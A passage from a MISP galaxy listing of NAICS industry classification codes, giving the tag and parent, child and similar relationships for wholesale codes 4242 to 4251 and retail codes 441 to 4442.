  • parent-of: misp-galaxy:naics="42421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424210" with estimative-language:likelihood-probability="likely"

42421

Drugs and Druggists' Sundries Merchant Wholesalers

The tag is: misp-galaxy:naics="42421"

42421 has relationships with:

  • child-of: misp-galaxy:naics="4242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424210" with estimative-language:likelihood-probability="likely"

424210

Drugs and Druggists' Sundries Merchant Wholesalers

The tag is: misp-galaxy:naics="424210"

424210 has relationships with:

  • child-of: misp-galaxy:naics="4242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42421" with estimative-language:likelihood-probability="likely"

4243

Apparel, Piece Goods, and Notions Merchant Wholesalers

The tag is: misp-galaxy:naics="4243"

4243 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42431" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42434" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42435" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424350" with estimative-language:likelihood-probability="likely"

42431

Piece Goods, Notions, and Other Dry Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="42431"

42431 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424310" with estimative-language:likelihood-probability="likely"

424310

Piece Goods, Notions, and Other Dry Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="424310"

424310 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42431" with estimative-language:likelihood-probability="likely"

42434

Footwear Merchant Wholesalers

The tag is: misp-galaxy:naics="42434"

42434 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424340" with estimative-language:likelihood-probability="likely"

424340

Footwear Merchant Wholesalers

The tag is: misp-galaxy:naics="424340"

424340 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42434" with estimative-language:likelihood-probability="likely"

42435

Clothing and Clothing Accessories Merchant Wholesalers

The tag is: misp-galaxy:naics="42435"

42435 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424350" with estimative-language:likelihood-probability="likely"

424350

Clothing and Clothing Accessories Merchant Wholesalers

The tag is: misp-galaxy:naics="424350"

424350 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42435" with estimative-language:likelihood-probability="likely"

4244

Grocery and Related Product Merchant Wholesalers

The tag is: misp-galaxy:naics="4244"

4244 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42442" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42443" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424430" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42444" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424440" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42445" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424450" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42446" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424460" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42447" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424470" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42448" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424480" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42449" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424490" with estimative-language:likelihood-probability="likely"

42441

General Line Grocery Merchant Wholesalers

The tag is: misp-galaxy:naics="42441"

42441 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424410" with estimative-language:likelihood-probability="likely"

424410

General Line Grocery Merchant Wholesalers

The tag is: misp-galaxy:naics="424410"

424410 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42441" with estimative-language:likelihood-probability="likely"

42442

Packaged Frozen Food Merchant Wholesalers

The tag is: misp-galaxy:naics="42442"

42442 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424420" with estimative-language:likelihood-probability="likely"

424420

Packaged Frozen Food Merchant Wholesalers

The tag is: misp-galaxy:naics="424420"

424420 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42442" with estimative-language:likelihood-probability="likely"

42443

Dairy Product (except Dried or Canned) Merchant Wholesalers

The tag is: misp-galaxy:naics="42443"

42443 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424430" with estimative-language:likelihood-probability="likely"

424430

Dairy Product (except Dried or Canned) Merchant Wholesalers

The tag is: misp-galaxy:naics="424430"

424430 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42443" with estimative-language:likelihood-probability="likely"

42444

Poultry and Poultry Product Merchant Wholesalers

The tag is: misp-galaxy:naics="42444"

42444 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424440" with estimative-language:likelihood-probability="likely"

424440

Poultry and Poultry Product Merchant Wholesalers

The tag is: misp-galaxy:naics="424440"

424440 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42444" with estimative-language:likelihood-probability="likely"

42445

Confectionery Merchant Wholesalers

The tag is: misp-galaxy:naics="42445"

42445 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424450" with estimative-language:likelihood-probability="likely"

424450

Confectionery Merchant Wholesalers

The tag is: misp-galaxy:naics="424450"

424450 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42445" with estimative-language:likelihood-probability="likely"

42446

Fish and Seafood Merchant Wholesalers

The tag is: misp-galaxy:naics="42446"

42446 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424460" with estimative-language:likelihood-probability="likely"

424460

Fish and Seafood Merchant Wholesalers

The tag is: misp-galaxy:naics="424460"

424460 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42446" with estimative-language:likelihood-probability="likely"

42447

Meat and Meat Product Merchant Wholesalers

The tag is: misp-galaxy:naics="42447"

42447 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424470" with estimative-language:likelihood-probability="likely"

424470

Meat and Meat Product Merchant Wholesalers

The tag is: misp-galaxy:naics="424470"

424470 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42447" with estimative-language:likelihood-probability="likely"

42448

Fresh Fruit and Vegetable Merchant Wholesalers

The tag is: misp-galaxy:naics="42448"

42448 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424480" with estimative-language:likelihood-probability="likely"

424480

Fresh Fruit and Vegetable Merchant Wholesalers

The tag is: misp-galaxy:naics="424480"

424480 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42448" with estimative-language:likelihood-probability="likely"

42449

Other Grocery and Related Products Merchant Wholesalers

The tag is: misp-galaxy:naics="42449"

42449 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424490" with estimative-language:likelihood-probability="likely"

424490

Other Grocery and Related Products Merchant Wholesalers

The tag is: misp-galaxy:naics="424490"

424490 has relationships with:

  • child-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42449" with estimative-language:likelihood-probability="likely"

4245

Farm Product Raw Material Merchant Wholesalers

The tag is: misp-galaxy:naics="4245"

4245 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42451" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424510" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42452" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424520" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424590" with estimative-language:likelihood-probability="likely"

42451

Grain and Field Bean Merchant Wholesalers

The tag is: misp-galaxy:naics="42451"

42451 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424510" with estimative-language:likelihood-probability="likely"

424510

Grain and Field Bean Merchant Wholesalers

The tag is: misp-galaxy:naics="424510"

424510 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42451" with estimative-language:likelihood-probability="likely"

42452

Livestock Merchant Wholesalers

The tag is: misp-galaxy:naics="42452"

42452 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424520" with estimative-language:likelihood-probability="likely"

424520

Livestock Merchant Wholesalers

The tag is: misp-galaxy:naics="424520"

424520 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42452" with estimative-language:likelihood-probability="likely"

42459

Other Farm Product Raw Material Merchant Wholesalers

The tag is: misp-galaxy:naics="42459"

42459 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424590" with estimative-language:likelihood-probability="likely"

424590

Other Farm Product Raw Material Merchant Wholesalers

The tag is: misp-galaxy:naics="424590"

424590 has relationships with:

  • child-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42459" with estimative-language:likelihood-probability="likely"

4246

Chemical and Allied Products Merchant Wholesalers

The tag is: misp-galaxy:naics="4246"

4246 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42461" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424610" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42469" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424690" with estimative-language:likelihood-probability="likely"

42461

Plastics Materials and Basic Forms and Shapes Merchant Wholesalers

The tag is: misp-galaxy:naics="42461"

42461 has relationships with:

  • child-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424610" with estimative-language:likelihood-probability="likely"

424610

Plastics Materials and Basic Forms and Shapes Merchant Wholesalers

The tag is: misp-galaxy:naics="424610"

424610 has relationships with:

  • child-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42461" with estimative-language:likelihood-probability="likely"

42469

Other Chemical and Allied Products Merchant Wholesalers

The tag is: misp-galaxy:naics="42469"

42469 has relationships with:

  • child-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424690" with estimative-language:likelihood-probability="likely"

424690

Other Chemical and Allied Products Merchant Wholesalers

The tag is: misp-galaxy:naics="424690"

424690 has relationships with:

  • child-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42469" with estimative-language:likelihood-probability="likely"

4247

Petroleum and Petroleum Products Merchant Wholesalers

The tag is: misp-galaxy:naics="4247"

4247 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42471" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424710" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42472" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424720" with estimative-language:likelihood-probability="likely"

42471

Petroleum Bulk Stations and Terminals

The tag is: misp-galaxy:naics="42471"

42471 has relationships with:

  • child-of: misp-galaxy:naics="4247" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424710" with estimative-language:likelihood-probability="likely"

424710

Petroleum Bulk Stations and Terminals

The tag is: misp-galaxy:naics="424710"

424710 has relationships with:

  • child-of: misp-galaxy:naics="4247" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42471" with estimative-language:likelihood-probability="likely"

42472

Petroleum and Petroleum Products Merchant Wholesalers (except Bulk Stations and Terminals)

The tag is: misp-galaxy:naics="42472"

42472 has relationships with:

  • child-of: misp-galaxy:naics="4247" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424720" with estimative-language:likelihood-probability="likely"

424720

Petroleum and Petroleum Products Merchant Wholesalers (except Bulk Stations and Terminals)

The tag is: misp-galaxy:naics="424720"

424720 has relationships with:

  • child-of: misp-galaxy:naics="4247" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42472" with estimative-language:likelihood-probability="likely"

4248

Beer, Wine, and Distilled Alcoholic Beverage Merchant Wholesalers

The tag is: misp-galaxy:naics="4248"

4248 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42481" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424810" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42482" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424820" with estimative-language:likelihood-probability="likely"

42481

Beer and Ale Merchant Wholesalers

The tag is: misp-galaxy:naics="42481"

42481 has relationships with:

  • child-of: misp-galaxy:naics="4248" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424810" with estimative-language:likelihood-probability="likely"

424810

Beer and Ale Merchant Wholesalers

The tag is: misp-galaxy:naics="424810"

424810 has relationships with:

  • child-of: misp-galaxy:naics="4248" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42481" with estimative-language:likelihood-probability="likely"

42482

Wine and Distilled Alcoholic Beverage Merchant Wholesalers

The tag is: misp-galaxy:naics="42482"

42482 has relationships with:

  • child-of: misp-galaxy:naics="4248" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424820" with estimative-language:likelihood-probability="likely"

424820

Wine and Distilled Alcoholic Beverage Merchant Wholesalers

The tag is: misp-galaxy:naics="424820"

424820 has relationships with:

  • child-of: misp-galaxy:naics="4248" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42482" with estimative-language:likelihood-probability="likely"

4249

Miscellaneous Nondurable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="4249"

4249 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42492" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42493" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42494" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42495" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424950" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42499" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424990" with estimative-language:likelihood-probability="likely"

42491

Farm Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42491"

42491 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424910" with estimative-language:likelihood-probability="likely"

424910

Farm Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="424910"

424910 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42491" with estimative-language:likelihood-probability="likely"

42492

Book, Periodical, and Newspaper Merchant Wholesalers

The tag is: misp-galaxy:naics="42492"

42492 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424920" with estimative-language:likelihood-probability="likely"

424920

Book, Periodical, and Newspaper Merchant Wholesalers

The tag is: misp-galaxy:naics="424920"

424920 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42492" with estimative-language:likelihood-probability="likely"

42493

Flower, Nursery Stock, and Florists' Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42493"

42493 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424930" with estimative-language:likelihood-probability="likely"

424930

Flower, Nursery Stock, and Florists' Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="424930"

424930 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42493" with estimative-language:likelihood-probability="likely"

42494

Tobacco Product and Electronic Cigarette Merchant Wholesalers

The tag is: misp-galaxy:naics="42494"

42494 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424940" with estimative-language:likelihood-probability="likely"

424940

Tobacco Product and Electronic Cigarette Merchant Wholesalers

The tag is: misp-galaxy:naics="424940"

424940 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42494" with estimative-language:likelihood-probability="likely"

42495

Paint, Varnish, and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42495"

42495 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424950" with estimative-language:likelihood-probability="likely"

424950

Paint, Varnish, and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="424950"

424950 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42495" with estimative-language:likelihood-probability="likely"

42499

Other Miscellaneous Nondurable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="42499"

42499 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424990" with estimative-language:likelihood-probability="likely"

424990

Other Miscellaneous Nondurable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="424990"

424990 has relationships with:

  • child-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42499" with estimative-language:likelihood-probability="likely"

425

Wholesale Trade Agents and Brokers

The tag is: misp-galaxy:naics="425"

425 has relationships with:

  • child-of: misp-galaxy:naics="42" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4251" with estimative-language:likelihood-probability="likely"

4251

Wholesale Trade Agents and Brokers

The tag is: misp-galaxy:naics="4251"

4251 has relationships with:

  • child-of: misp-galaxy:naics="425" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="425120" with estimative-language:likelihood-probability="likely"

42512

Wholesale Trade Agents and Brokers

The tag is: misp-galaxy:naics="42512"

42512 has relationships with:

  • child-of: misp-galaxy:naics="4251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="425120" with estimative-language:likelihood-probability="likely"

425120

Wholesale Trade Agents and Brokers

The tag is: misp-galaxy:naics="425120"

425120 has relationships with:

  • child-of: misp-galaxy:naics="4251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42512" with estimative-language:likelihood-probability="likely"

44-45

Retail Trade

The tag is: misp-galaxy:naics="44-45"

441

Motor Vehicle and Parts Dealers

The tag is: misp-galaxy:naics="441"

441 has relationships with:

  • parent-of: misp-galaxy:naics="4411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4413" with estimative-language:likelihood-probability="likely"

4411

Automobile Dealers

The tag is: misp-galaxy:naics="4411"

4411 has relationships with:

  • child-of: misp-galaxy:naics="441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441120" with estimative-language:likelihood-probability="likely"

44111

New Car Dealers

The tag is: misp-galaxy:naics="44111"

44111 has relationships with:

  • child-of: misp-galaxy:naics="4411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="441110" with estimative-language:likelihood-probability="likely"

441110

New Car Dealers

The tag is: misp-galaxy:naics="441110"

441110 has relationships with:

  • child-of: misp-galaxy:naics="4411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44111" with estimative-language:likelihood-probability="likely"

44112

Used Car Dealers

The tag is: misp-galaxy:naics="44112"

44112 has relationships with:

  • child-of: misp-galaxy:naics="4411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="441120" with estimative-language:likelihood-probability="likely"

441120

Used Car Dealers

The tag is: misp-galaxy:naics="441120"

441120 has relationships with:

  • child-of: misp-galaxy:naics="4411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44112" with estimative-language:likelihood-probability="likely"

4412

Other Motor Vehicle Dealers

The tag is: misp-galaxy:naics="4412"

4412 has relationships with:

  • child-of: misp-galaxy:naics="441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441227" with estimative-language:likelihood-probability="likely"

44121

Recreational Vehicle Dealers

The tag is: misp-galaxy:naics="44121"

44121 has relationships with:

  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="441210" with estimative-language:likelihood-probability="likely"

441210

Recreational Vehicle Dealers

The tag is: misp-galaxy:naics="441210"

441210 has relationships with:

  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44121" with estimative-language:likelihood-probability="likely"

44122

Motorcycle, Boat, and Other Motor Vehicle Dealers

The tag is: misp-galaxy:naics="44122"

44122 has relationships with:

  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

441222

Boat Dealers

The tag is: misp-galaxy:naics="441222"

441222 has relationships with:

  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

441227

Motorcycle, ATV, and All Other Motor Vehicle Dealers

The tag is: misp-galaxy:naics="441227"

441227 has relationships with:

  • child-of: misp-galaxy:naics="4412" with estimative-language:likelihood-probability="likely"

4413

Automotive Parts, Accessories, and Tire Retailers

The tag is: misp-galaxy:naics="4413"

4413 has relationships with:

  • child-of: misp-galaxy:naics="441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44134" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="441340" with estimative-language:likelihood-probability="likely"

44133

Automotive Parts and Accessories Retailers

The tag is: misp-galaxy:naics="44133"

44133 has relationships with:

  • child-of: misp-galaxy:naics="4413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="441330" with estimative-language:likelihood-probability="likely"

441330

Automotive Parts and Accessories Retailers

The tag is: misp-galaxy:naics="441330"

441330 has relationships with:

  • child-of: misp-galaxy:naics="4413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44133" with estimative-language:likelihood-probability="likely"

44134

Tire Dealers

The tag is: misp-galaxy:naics="44134"

44134 has relationships with:

  • child-of: misp-galaxy:naics="4413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="441340" with estimative-language:likelihood-probability="likely"

441340

Tire Dealers

The tag is: misp-galaxy:naics="441340"

441340 has relationships with:

  • child-of: misp-galaxy:naics="4413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44134" with estimative-language:likelihood-probability="likely"

444

Building Material and Garden Equipment and Supplies Dealers

The tag is: misp-galaxy:naics="444"

444 has relationships with:

  • parent-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4442" with estimative-language:likelihood-probability="likely"

4441

Building Material and Supplies Dealers

The tag is: misp-galaxy:naics="4441"

4441 has relationships with:

  • child-of: misp-galaxy:naics="444" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44414" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44418" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444180" with estimative-language:likelihood-probability="likely"

44411

Home Centers

The tag is: misp-galaxy:naics="44411"

44411 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444110" with estimative-language:likelihood-probability="likely"

444110

Home Centers

The tag is: misp-galaxy:naics="444110"

444110 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44411" with estimative-language:likelihood-probability="likely"

44412

Paint and Wallpaper Retailers

The tag is: misp-galaxy:naics="44412"

44412 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444120" with estimative-language:likelihood-probability="likely"

444120

Paint and Wallpaper Retailers

The tag is: misp-galaxy:naics="444120"

444120 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44412" with estimative-language:likelihood-probability="likely"

44414

Hardware Retailers

The tag is: misp-galaxy:naics="44414"

44414 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444140" with estimative-language:likelihood-probability="likely"

444140

Hardware Retailers

The tag is: misp-galaxy:naics="444140"

444140 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44414" with estimative-language:likelihood-probability="likely"

44418

Other Building Material Dealers

The tag is: misp-galaxy:naics="44418"

44418 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444180" with estimative-language:likelihood-probability="likely"

444180

Other Building Material Dealers

The tag is: misp-galaxy:naics="444180"

444180 has relationships with:

  • child-of: misp-galaxy:naics="4441" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44418" with estimative-language:likelihood-probability="likely"

4442

Lawn and Garden Equipment and Supplies Retailers

The tag is: misp-galaxy:naics="4442"

4442 has relationships with:

  • child-of: misp-galaxy:naics="444" with estimative-language:likelihood-probability="likely"

